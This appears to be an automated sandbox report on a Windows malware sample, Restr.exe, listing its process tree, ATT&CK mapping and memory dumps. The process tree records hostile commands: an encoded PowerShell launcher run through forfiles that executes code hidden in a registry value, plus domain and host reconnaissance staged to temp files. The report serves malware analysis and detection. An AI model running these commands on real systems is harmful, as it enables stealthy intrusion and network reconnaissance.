PID 2420 wrote to memory of 2012	2420	iexplore.exe	100
PID 2420 wrote to memory of 3344	2420	iexplore.exe	101
PID 2420 wrote to memory of 3344	2420	iexplore.exe	101
PID 2420 wrote to memory of 3344	2420	iexplore.exe	101
PID 1444 wrote to memory of 3268	1444	cmd.exe	104
PID 1444 wrote to memory of 3268	1444	cmd.exe	104
PID 3268 wrote to memory of 1184	3268	forfiles.exe	106
PID 3268 wrote to memory of 1184	3268	forfiles.exe	106
PID 1184 wrote to memory of 3884	1184	cmd.exe	107
PID 1184 wrote to memory of 3884	1184	cmd.exe	107
PID 3884 wrote to memory of 3896	3884	powershell.exe	108
PID 3884 wrote to memory of 3896	3884	powershell.exe	108
PID 3884 wrote to memory of 2864	3884	powershell.exe	109
PID 3884 wrote to memory of 2864	3884	powershell.exe	109
PID 3884 wrote to memory of 212	3884	powershell.exe	110
PID 3884 wrote to memory of 212	3884	powershell.exe	110
PID 212 wrote to memory of 204	212	csc.exe	111
PID 212 wrote to memory of 204	212	csc.exe	111
PID 3884 wrote to memory of 3596	3884	powershell.exe	112
PID 3884 wrote to memory of 3596	3884	powershell.exe	112
PID 3596 wrote to memory of 1380	3596	csc.exe	113
PID 3596 wrote to memory of 1380	3596	csc.exe	113
PID 3884 wrote to memory of 656	3884	powershell.exe	52
PID 4376 wrote to memory of 656	4376	Restr.exe	52
PID 5016 wrote to memory of 3344	5016	cmd.exe	121
PID 5016 wrote to memory of 3344	5016	cmd.exe	121
PID 3344 wrote to memory of 1704	3344	net.exe	122
PID 3344 wrote to memory of 1704	3344	net.exe	122
PID 3084 wrote to memory of 5076	3084	cmd.exe	127
PID 3084 wrote to memory of 5076	3084	cmd.exe	127
PID 4912 wrote to memory of 4768	4912	cmd.exe	136
PID 4912 wrote to memory of 4768	4912	cmd.exe	136
PID 1808 wrote to memory of 3824	1808	cmd.exe	141
PID 1808 wrote to memory of 3824	1808	cmd.exe	141
PID 2968 wrote to memory of 4132	2968	cmd.exe	146

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:656
- C:\Users\Admin\AppData\Local\Temp\Restr.exe
  "C:\Users\Admin\AppData\Local\Temp\Restr.exe"
  2⤵
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:4376
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 964
    3⤵
    - Program crash
    PID:3316
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1444
- - C:\Windows\system32\forfiles.exe
    forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3268
  - - C:\Windows\system32\cmd.exe
      /k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1184
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA==
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3884
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3896
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2864
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q2nnynnq\q2nnynnq.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:212
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC14A.tmp" "c:\Users\Admin\AppData\Local\Temp\q2nnynnq\CSCB276EDCFA1D54AF48A876186B9A9B79.TMP"
        7⤵
        
        PID:204
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gx2uheqz\gx2uheqz.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3596
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC215.tmp" "c:\Users\Admin\AppData\Local\Temp\gx2uheqz\CSCE43D2439906A4DEB84F6BE8B83451D.TMP"
        7⤵
        
        PID:1380
- C:\Windows\system32\cmd.exe
  cmd /C "net session" >> C:\Users\Admin\AppData\Local\Temp\5B1B.bin0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5016
- - C:\Windows\system32\net.exe
    net session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3344
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:1704
- C:\Windows\system32\cmd.exe
  cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5B1B.bin0 > C:\Users\Admin\AppData\Local\Temp\5B1B.bin & del C:\Users\Admin\AppData\Local\Temp\5B1B.bin0"
  2⤵
  PID:1144
- C:\Windows\system32\cmd.exe
  cmd /C "systeminfo.exe" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3084
- - C:\Windows\system32\systeminfo.exe
    systeminfo.exe
    3⤵
    - Gathers system information
    PID:5076
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- 1" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  PID:796
- C:\Windows\system32\cmd.exe
  cmd /C "net view" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4912
- - C:\Windows\system32\net.exe
    net view
    3⤵
    - Discovers systems in the same network
    PID:4768
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- 2" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  PID:5108
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup 127.0.0.1" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1808
- - C:\Windows\system32\nslookup.exe
    nslookup 127.0.0.1
    3⤵
    PID:3824
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- 3" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  PID:5112
- C:\Windows\system32\cmd.exe
  cmd /C "whoami /all" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2968
- - C:\Windows\system32\whoami.exe
    whoami /all
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4132
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- 4" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  PID:852
- C:\Windows\system32\cmd.exe
  cmd /C "net localgroup administrators" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  PID:2588
- - C:\Windows\system32\net.exe
    net localgroup administrators
    3⤵
    PID:4336
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:376
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- 5" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  PID:3840
- C:\Windows\system32\cmd.exe
  cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  PID:548
- - C:\Windows\system32\net.exe
    net group "domain computers" /domain
    3⤵
    PID:3492
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 group "domain computers" /domain
      4⤵
      PID:3156
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- 6" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  PID:4576
- C:\Windows\system32\cmd.exe
  cmd /C "tasklist.exe /SVC" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  PID:1528
- - C:\Windows\system32\tasklist.exe
    tasklist.exe /SVC
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1436
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- 7" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  PID:2052
- C:\Windows\system32\cmd.exe
  cmd /C "driverquery.exe" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  PID:3484
- - C:\Windows\system32\driverquery.exe
    driverquery.exe
    3⤵
    PID:3396
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- 8" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  PID:1276
- C:\Windows\system32\cmd.exe
  cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  PID:3912
- - C:\Windows\system32\reg.exe
    reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
    3⤵
    PID:764
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- 9" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  PID:3804
- C:\Windows\system32\cmd.exe
  cmd /C "wmic computersystem get domain |more" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
  2⤵
  PID:2296
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get domain
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:504
- - C:\Windows\system32\more.com
    more
    3⤵
    PID:4068
- C:\Windows\system32\cmd.exe
  cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\8482.bin0 > C:\Users\Admin\AppData\Local\Temp\8482.bin & del C:\Users\Admin\AppData\Local\Temp\8482.bin0"
  2⤵
  PID:4160
- C:\Windows\system32\cmd.exe
  cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\268A.bin0
  2⤵
  PID:1132
- - C:\Windows\system32\net.exe
    net group "domain computers" /domain
    3⤵
    PID:396
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 group "domain computers" /domain
      4⤵
      PID:1356
- C:\Windows\syswow64\svchost.exe
  C:\Windows\syswow64\svchost.exe
  2⤵
  PID:808

C:\Program Files (x86)\Internet Explorer\ielowutil.exe
"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
1⤵
PID:2192

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2420
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:17410 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2728
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82950 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:1748
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82954 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:4592
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:17412 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:3596
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82960 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2180
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82964 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:4732
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82968 /prefetch:2
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:1564
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82972 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2320
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82976 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:4184
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82980 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2012
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82984 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:3344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4376 -ip 4376
1⤵
PID:2580

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Privilege Escalation

Defense Evasion

Connection Proxy

T1090

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Connection Proxy

T1090

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/656-168-0x00000000010F0000-0x0000000001105000-memory.dmp

Filesize
84KB

Download
memory/656-169-0x00000000010D0000-0x00000000010E5000-memory.dmp

Filesize
84KB

Download
memory/2864-154-0x00007FFF88360000-0x00007FFF88E21000-memory.dmp

Filesize
10.8MB

Download
memory/3884-146-0x000001EA31680000-0x000001EA31690000-memory.dmp

Filesize
64KB

Download
memory/3884-144-0x000001EA332D0000-0x000001EA332F2000-memory.dmp

Filesize
136KB

Download
memory/3884-145-0x00007FFF88360000-0x00007FFF88E21000-memory.dmp

Filesize
10.8MB

Download
memory/3884-165-0x000001EA4B7A0000-0x000001EA4B7B3000-memory.dmp

Filesize
76KB

Download
memory/3884-147-0x000001EA31680000-0x000001EA31690000-memory.dmp

Filesize
64KB

Download
memory/3884-148-0x000001EA31680000-0x000001EA31690000-memory.dmp

Filesize
64KB

Download
memory/3896-151-0x000002644EAD3000-0x000002644EAD5000-memory.dmp

Filesize
8KB

Download
memory/3896-150-0x00007FFF88360000-0x00007FFF88E21000-memory.dmp

Filesize
10.8MB

Download
memory/3896-149-0x000002644EAD0000-0x000002644EAD2000-memory.dmp

Filesize
8KB

Download
memory/4376-167-0x00000000001C0000-0x00000000001CE000-memory.dmp

Filesize
56KB

Download
memory/4376-130-0x00000000004AE000-0x00000000004BA000-memory.dmp

Filesize
48KB

Download
memory/4376-134-0x0000000000D40000-0x0000000000D50000-memory.dmp

Filesize
64KB

Download
memory/4376-133-0x0000000001000000-0x000000000106F000-memory.dmp

Filesize
444KB

Download
memory/4376-132-0x00000000005B0000-0x00000000005BC000-memory.dmp

Filesize
48KB

Download
memory/4376-131-0x00000000004AE000-0x00000000004BA000-memory.dmp

Filesize
48KB

Download